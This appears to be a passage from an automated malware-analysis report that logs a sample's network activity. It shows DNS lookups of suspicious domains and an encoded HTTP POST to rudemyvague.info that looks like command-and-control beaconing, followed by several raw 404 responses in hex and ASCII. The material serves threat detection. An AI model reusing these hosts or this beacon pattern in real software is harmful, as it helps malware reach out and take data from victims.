            Source: global trafficDNS traffic detected: DNS query: www.booosted.xyz
            Source: global trafficDNS traffic detected: DNS query: www.djazdgc.tokyo
            Source: global trafficDNS traffic detected: DNS query: www.productanalytics.pro
            Source: global trafficDNS traffic detected: DNS query: www.kmjai8jf.icu
            Source: unknownHTTP traffic detected: POST /t7t4/ HTTP/1.1Host: www.rudemyvague.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enOrigin: http://www.rudemyvague.infoReferer: http://www.rudemyvague.info/t7t4/Content-Length: 206Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36Data Raw: 44 72 65 6c 48 3d 45 4f 73 66 47 75 4e 45 7a 67 6d 2f 56 6e 6f 42 37 71 2b 53 35 7a 5a 65 62 2f 30 50 68 4d 5a 61 38 4f 6a 57 76 43 65 74 76 46 49 62 66 74 4f 6d 4f 6d 72 37 51 51 2f 4f 70 66 56 39 4e 64 49 61 50 56 55 39 51 35 63 35 70 6e 53 6d 5a 4a 37 63 6f 2f 6d 58 4e 58 71 65 61 43 69 72 6a 54 32 67 64 2b 73 39 48 51 70 71 72 36 64 39 72 61 6e 2b 52 47 42 58 37 56 56 69 2f 75 75 64 62 33 42 37 6c 34 30 4c 30 51 52 51 30 2b 6f 48 77 50 59 6c 69 45 79 79 2b 34 41 59 38 4d 6d 4a 4c 46 41 53 63 55 54 7a 48 5a 2f 52 50 4f 65 6e 59 30 73 5a 54 4d 49 30 4b 6e 59 44 72 2b 6b 6c 4a 47 6b 6c 4e 42 6f 6e 2b 52 77 3d Data Ascii: DrelH=EOsfGuNEzgm/VnoB7q+S5zZeb/0PhMZa8OjWvCetvFIbftOmOmr7QQ/OpfV9NdIaPVU9Q5c5pnSmZJ7co/mXNXqeaCirjT2gd+s9HQpqr6d9ran+RGBX7VVi/uudb3B7l40L0QRQ0+oHwPYliEyy+4AY8MmJLFAScUTzHZ/RPOenY0sZTMI0KnYDr+klJGklNBon+Rw=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 20:57:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g17BlI2XQDR7Yw4E2bZjNqXNLYUGG6gDzX9YiuUwyut7cLBegf0T4C0Ug02aDn2WopUjAv9PHYI%2BnQL%2FhsS0ZPolswgDJnbqw4%2FrUbbmDSKjtFDyf2nhnZ5vmrXdo4a4W1WTgQfQ6Obu4g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d6c663bc80d4662-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1288&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=765&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 62 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e b1 0a c2 30 10 86 f7 42 df e1 dc 74 68 d3 40 07 87 23 8b 28 38 e8 22 3e 40 ea 9d 4d 20 4d 4a 4c c1 be bd 54 2d 88 b3 a3 d3 c1 ff 7f ff c7 a1 49 9d 53 79 86 86 35 29 4c 36 39 56 75 55 c3 31 24 d8 85 c1 13 8a 57 88 e2 89 e4 19 36 81 c6 e9 5e d8 27 8e 0a 8d fc 5e 18 a9 50 bc eb c9 1d d5 0c fb d6 fa bb 90 a5 5c 97 15 2c cf cd e0 d3 b0 fa 64 c5 6c 17 f3 67 8b a2 00 0d bd 26 b2 be 85 14 80 ec 4d 37 8e e1 70 da 6f 41 7b 82 8d 89 a1 63 b8 46 cb 9e dc 08 1c 63 88 d0 eb 96 a1 28 fe 8a 5f 2b 1e 2a b6 49 35 34 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b70Bth@#(8">@M MJLT-ISy5)L69VuU1$W6^'^P\,dlg&M7poA{cFc(_+*I540
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 20:57:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sFX6P1PjLgt0ExkCo76f%2F44F0yoJ2dKiNxMnfh%2FmxLZV3p2EYxCqwENV5FtDEyuv5hjJauO3OkT8gfRnTvL6CE2JXPqOm6FJ6JLp3%2BUMezX3wSrMs6qSUv5fCkGAlTTbexMw3SaQHpamOA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d6c664baf2ce972-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2004&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=785&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 62 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e b1 0a c2 30 10 86 f7 42 df e1 dc 74 68 d3 40 07 87 23 8b 28 38 e8 22 3e 40 ea 9d 4d 20 4d 4a 4c c1 be bd 54 2d 88 b3 a3 d3 c1 ff 7f ff c7 a1 49 9d 53 79 86 86 35 29 4c 36 39 56 75 55 c3 31 24 d8 85 c1 13 8a 57 88 e2 89 e4 19 36 81 c6 e9 5e d8 27 8e 0a 8d fc 5e 18 a9 50 bc eb c9 1d d5 0c fb d6 fa bb 90 a5 5c 97 15 2c cf cd e0 d3 b0 fa 64 c5 6c 17 f3 67 8b a2 00 0d bd 26 b2 be 85 14 80 ec 4d 37 8e e1 70 da 6f 41 7b 82 8d 89 a1 63 b8 46 cb 9e dc 08 1c 63 88 d0 eb 96 a1 28 fe 8a 5f 2b 1e 2a b6 49 35 34 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b70Bth@#(8">@M MJLT-ISy5)L69VuU1$W6^'^P\,dlg&M7poA{cFc(_+*I540
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 20:57:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GmH9ifoe%2FMIhysmT3ZRaPky0FeAqEjW4w8b6A0LMBAjdLg66wwufg8QrKzkwsqUuJ1zgMSLb8HpUQaaMbW0b9L5wXMFtx9Urq52Su2Nt3Jo%2Bqc394ps%2FWYIyuHH3UbvIx%2FAc2G7QqgNrbA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d6c665c795728ab-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1615&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1802&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 62 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e b1 0a c2 30 10 86 f7 42 df e1 dc 74 68 d3 40 07 87 23 8b 28 38 e8 22 3e 40 ea 9d 4d 20 4d 4a 4c c1 be bd 54 2d 88 b3 a3 d3 c1 ff 7f ff c7 a1 49 9d 53 79 86 86 35 29 4c 36 39 56 75 55 c3 31 24 d8 85 c1 13 8a 57 88 e2 89 e4 19 36 81 c6 e9 5e d8 27 8e 0a 8d fc 5e 18 a9 50 bc eb c9 1d d5 0c fb d6 fa bb 90 a5 5c 97 15 2c cf cd e0 d3 b0 fa 64 c5 6c 17 f3 67 8b a2 00 0d bd 26 b2 be 85 14 80 ec 4d 37 8e e1 70 da 6f 41 7b 82 8d 89 a1 63 b8 46 cb 9e dc 08 1c 63 88 d0 eb 96 a1 28 fe 8a 5f 2b 1e 2a b6 49 35 34 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b70Bth@#(8">@M MJLT-ISy5)L69VuU1$W6^'^P\,dlg&M7poA{cFc(_+*I540
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 20:57:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0LxblphZLuKi7yr2hFSUhe7l7SdJ%2FUHaXwBjvNWaEte2dfIR6%2Fh%2BopK35eJXtGXtjK%2B4n0zr1wG7uKPVBaYfkmVuVexf7xqxLiEA6XBO6K1xtLtQX%2F%2FeJJAdE2C7wEszlOXGhsPl8s6rxQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d6c666c7a660b76-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1304&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=488&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 33 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 Data Ascii: 234<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 20:58:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 20:58:33 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 20:58:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 20:58:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 22 Oct 2024 20:58:44 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 22 Oct 2024 20:58:46 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE 